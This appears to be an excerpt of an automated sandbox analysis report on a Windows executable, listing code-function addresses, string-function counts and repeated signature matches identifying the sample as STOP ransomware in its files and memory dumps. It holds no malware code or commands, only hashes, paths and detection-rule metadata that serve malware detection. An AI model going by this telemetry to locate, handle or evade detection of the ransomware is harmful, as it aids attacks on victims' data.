Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E26880	4_2_00E26880
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E4C804	4_2_00E4C804
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E269F3	4_2_00E269F3
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E6D9DC	4_2_00E6D9DC
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00EA1920	4_2_00EA1920
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E69A71	4_2_00E69A71
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E22B80	4_2_00E22B80
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E26B80	4_2_00E26B80
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E63B40	4_2_00E63B40
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E6ACFF	4_2_00E6ACFF
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E29CF9	4_2_00E29CF9
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E29DFA	4_2_00E29DFA
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E2BDC0	4_2_00E2BDC0
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E47D6C	4_2_00E47D6C
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E2DD40	4_2_00E2DD40
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E26EE0	4_2_00E26EE0
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E4CE51	4_2_00E4CE51
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E69FE3	4_2_00E69FE3
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E29F76	4_2_00E29F76
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E40F30	4_2_00E40F30

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 004C47A0 appears 64 times
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 004C4E50 appears 62 times
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00498C81 appears 74 times
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 004C0870 appears 52 times
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 004BF23E appears 108 times
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00498520 appears 136 times
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00490EC2 appears 40 times
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 0049F7C0 appears 129 times
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 004B1A25 appears 44 times
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00492587 appears 48 times
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 004BF26C appears 41 times
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00E48520 appears 136 times
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00E6F23E appears 108 times
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00E747A0 appears 64 times
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00E40EC2 appears 40 times
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00E74E50 appears 62 times
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00E48C81 appears 74 times
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00E70870 appears 52 times
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00E42587 appears 48 times
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00E6F26C appears 41 times
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00E61A25 appears 44 times
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: String function: 00E4F7C0 appears 129 times

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: SAMPLE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: SAMPLE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000004.00000002.1787079865.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000000.1675439024.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000003.1687478717.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000002.00000000.1691195680.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000000.1675353698.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000000.1774988974.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000002.00000000.1691104107.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000003.00000000.1702670598.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.1868867088.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000000.1855772078.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.1787026670.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000000.1774903809.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.1868782664.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000000.1855703010.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000003.00000000.1702755799.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
